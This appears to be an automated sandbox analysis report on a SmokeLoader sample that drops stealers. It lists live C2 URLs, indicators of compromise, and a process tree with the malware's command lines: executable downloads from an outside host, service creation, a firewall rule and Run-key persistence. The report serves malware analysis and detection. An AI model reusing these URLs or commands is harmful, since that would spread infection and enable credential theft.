Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
09/01/2022, 18:16
Static task
static1
Behavioral task
behavioral1
Sample
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
Resource
win10-en-20211208
General
-
Target
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
-
Size
289KB
-
MD5
0c7cd5a32bf32320089d44dc1a2cb8a3
-
SHA1
f5d6dbeecc9b6020a34811f5ef6310198288ffc2
-
SHA256
2b8d595d4763ee7ae46bf143f394fe9239d2a0d1a77dea9d2f69cfb5e253c042
-
SHA512
2151614602a002efedd85e158f901be5f145c75376e105a5b6071c89003294336583ec439a64c6dfa760d6709ee1cb5d6bc270355953b9390b2e19409c05099a
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 6 IoCs
resource yara_rule behavioral1/memory/1828-78-0x00000000002D0000-0x00000000002EC000-memory.dmp family_arkei behavioral1/memory/1828-77-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral1/memory/1920-138-0x0000000001150000-0x000000000150F000-memory.dmp family_arkei behavioral1/memory/1920-139-0x0000000001150000-0x000000000150F000-memory.dmp family_arkei behavioral1/memory/1920-140-0x0000000001150000-0x000000000150F000-memory.dmp family_arkei behavioral1/memory/1920-141-0x0000000001150000-0x000000000150F000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 2 IoCs
flow pid Process 129 960 WScript.exe 132 960 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
pid Process 864 86DC.exe 1828 A7F8.exe 1752 B457.exe 364 C633.exe 1688 brbdpypu.exe 1724 C633.exe 960 C633.exe 1680 39AE.exe 1920 4EA6.exe 524 79DB.exe 1740 39AE.exe 900 B615.exe 1516 D53A.exe 644 EA51.exe 1460 extd.exe 996 extd.exe 1048 setup1.exe 1280 extd.exe 1464 setup2.exe 1688 extd.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x0007000000012685-207.dat upx behavioral1/files/0x0007000000012685-209.dat upx behavioral1/files/0x0007000000012685-215.dat upx behavioral1/files/0x0007000000012685-231.dat upx behavioral1/files/0x0007000000012685-239.dat upx behavioral1/files/0x0007000000012685-275.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4EA6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4EA6.exe -
Deletes itself 1 IoCs
pid Process 1360 Process not Found -
Loads dropped DLL 15 IoCs
pid Process 364 C633.exe 364 C633.exe 1680 39AE.exe 1920 4EA6.exe 1920 4EA6.exe 1920 4EA6.exe 1920 4EA6.exe 1920 4EA6.exe 1888 WerFault.exe 1888 WerFault.exe 1888 WerFault.exe 1888 WerFault.exe 1888 WerFault.exe 1888 WerFault.exe 1888 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4EA6.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1920 4EA6.exe 1920 4EA6.exe 1516 D53A.exe 1464 setup2.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 960 set thread context of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 364 set thread context of 960 364 C633.exe 48 PID 1688 set thread context of 1752 1688 brbdpypu.exe 54 PID 1680 set thread context of 1740 1680 39AE.exe 58 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1888 524 WerFault.exe 55 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0c7cd5a32bf32320089d44dc1a2cb8a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 86DC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 86DC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 39AE.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 39AE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0c7cd5a32bf32320089d44dc1a2cb8a3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0c7cd5a32bf32320089d44dc1a2cb8a3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 86DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 39AE.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4EA6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4EA6.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1768 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
pid Process 1460 extd.exe 996 extd.exe 1048 setup1.exe 1280 extd.exe 1464 setup2.exe 1688 extd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1636 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 1636 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1360 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 1636 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 864 86DC.exe 1360 Process not Found 1360 Process not Found 1360 Process not Found 1360 Process not Found 1740 39AE.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 364 C633.exe Token: SeDebugPrivilege 960 C633.exe Token: SeDebugPrivilege 900 B615.exe Token: SeShutdownPrivilege 1360 Process not Found Token: SeShutdownPrivilege 1360 Process not Found Token: SeShutdownPrivilege 1360 Process not Found Token: SeDebugPrivilege 1888 WerFault.exe Token: SeShutdownPrivilege 1360 Process not Found Token: SeDebugPrivilege 1464 setup2.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1360 Process not Found 1360 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1360 Process not Found 1360 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 960 wrote to memory of 1636 960 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 27 PID 1360 wrote to memory of 864 1360 Process not Found 28 PID 1360 wrote to memory of 864 1360 Process not Found 28 PID 1360 wrote to memory of 864 1360 Process not Found 28 PID 1360 wrote to memory of 864 1360 Process not Found 28 PID 1360 wrote to memory of 1828 1360 Process not Found 29 PID 1360 wrote to memory of 1828 1360 Process not Found 29 PID 1360 wrote to memory of 1828 1360 Process not Found 29 PID 1360 wrote to memory of 1828 1360 Process not Found 29 PID 1360 wrote to memory of 1752 1360 Process not Found 30 PID 1360 wrote to memory of 1752 1360 Process not Found 30 PID 1360 wrote to memory of 1752 1360 Process not Found 30 PID 1360 wrote to memory of 1752 1360 Process not Found 30 PID 1360 wrote to memory of 364 1360 Process not Found 31 PID 1360 wrote to memory of 364 1360 Process not Found 31 PID 1360 wrote to memory of 364 1360 Process not Found 31 PID 1360 wrote to memory of 364 1360 Process not Found 31 PID 1752 wrote to memory of 304 1752 B457.exe 34 PID 1752 wrote to memory of 304 1752 B457.exe 34 PID 1752 wrote to memory of 304 1752 B457.exe 34 PID 1752 wrote to memory of 304 1752 B457.exe 34 PID 364 wrote to memory of 1724 364 C633.exe 36 PID 364 wrote to memory of 1724 364 C633.exe 36 PID 364 wrote to memory of 1724 364 C633.exe 36 PID 364 wrote to memory of 1724 364 C633.exe 36 PID 1752 wrote to memory of 1736 1752 B457.exe 37 PID 1752 wrote to memory of 1736 1752 B457.exe 37 PID 1752 wrote to memory of 1736 1752 B457.exe 37 PID 1752 wrote to memory of 1736 1752 B457.exe 37 PID 1752 wrote to memory of 692 1752 B457.exe 39 PID 1752 wrote to memory of 692 1752 B457.exe 39 PID 1752 wrote to memory of 692 1752 B457.exe 39 PID 1752 wrote to memory of 692 1752 B457.exe 39 PID 1752 wrote to memory of 908 1752 B457.exe 41 PID 1752 wrote to memory of 908 1752 B457.exe 41 PID 1752 wrote to memory of 908 1752 B457.exe 41 PID 1752 wrote to memory of 908 1752 B457.exe 41 PID 1752 wrote to memory of 1188 1752 B457.exe 43 PID 1752 wrote to memory of 1188 1752 B457.exe 43 PID 1752 wrote to memory of 1188 1752 B457.exe 43 PID 1752 wrote to memory of 1188 1752 B457.exe 43 PID 1752 wrote to memory of 832 1752 B457.exe 45 PID 1752 wrote to memory of 832 1752 B457.exe 45 PID 1752 wrote to memory of 832 1752 B457.exe 45 PID 1752 wrote to memory of 832 1752 B457.exe 45 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 364 wrote to memory of 960 364 C633.exe 48 PID 1360 wrote to memory of 1280 1360 Process not Found 49 PID 1360 wrote to memory of 1280 1360 Process not Found 49 PID 1360 wrote to memory of 1280 1360 Process not Found 49 PID 1360 wrote to memory of 1280 1360 Process not Found 49 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\86DC.exeC:\Users\Admin\AppData\Local\Temp\86DC.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:864
-
C:\Users\Admin\AppData\Local\Temp\A7F8.exeC:\Users\Admin\AppData\Local\Temp\A7F8.exe1⤵
- Executes dropped EXE
PID:1828
-
C:\Users\Admin\AppData\Local\Temp\B457.exeC:\Users\Admin\AppData\Local\Temp\B457.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hzcuoktb\2⤵PID:304
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\brbdpypu.exe" C:\Windows\SysWOW64\hzcuoktb\2⤵PID:1736
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create hzcuoktb binPath= "C:\Windows\SysWOW64\hzcuoktb\brbdpypu.exe /d\"C:\Users\Admin\AppData\Local\Temp\B457.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:692
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description hzcuoktb "wifi internet conection"2⤵PID:908
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start hzcuoktb2⤵PID:1188
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:832
-
-
C:\Users\Admin\AppData\Local\Temp\C633.exeC:\Users\Admin\AppData\Local\Temp\C633.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Users\Admin\AppData\Local\Temp\C633.exeC:\Users\Admin\AppData\Local\Temp\C633.exe2⤵
- Executes dropped EXE
PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\C633.exeC:\Users\Admin\AppData\Local\Temp\C633.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\SysWOW64\hzcuoktb\brbdpypu.exeC:\Windows\SysWOW64\hzcuoktb\brbdpypu.exe /d"C:\Users\Admin\AppData\Local\Temp\B457.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1688 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:1752
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1280
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\39AE.exeC:\Users\Admin\AppData\Local\Temp\39AE.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\39AE.exeC:\Users\Admin\AppData\Local\Temp\39AE.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\4EA6.exeC:\Users\Admin\AppData\Local\Temp\4EA6.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:1920 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4EA6.exe" & exit2⤵PID:908
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\79DB.exeC:\Users\Admin\AppData\Local\Temp\79DB.exe1⤵
- Executes dropped EXE
PID:524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 4402⤵
- Loads dropped DLL
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Users\Admin\AppData\Local\Temp\B615.exeC:\Users\Admin\AppData\Local\Temp\B615.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:900
-
C:\Users\Admin\AppData\Local\Temp\D53A.exeC:\Users\Admin\AppData\Local\Temp\D53A.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1516
-
C:\Users\Admin\AppData\Local\Temp\EA51.exeC:\Users\Admin\AppData\Local\Temp\EA51.exe1⤵
- Executes dropped EXE
PID:644 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\EAAF.bat C:\Users\Admin\AppData\Local\Temp\EA51.exe"2⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1460
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1488\123.vbs"3⤵
- Blocklisted process makes network request
PID:960
-
-
C:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\1488\setup1.exesetup1.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1048
-
-
C:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\1488\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\1488\setup3.exesetup3.exe3⤵PID:1756
-
-
C:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\EAAD.tmp\EAAE.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵PID:1280
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1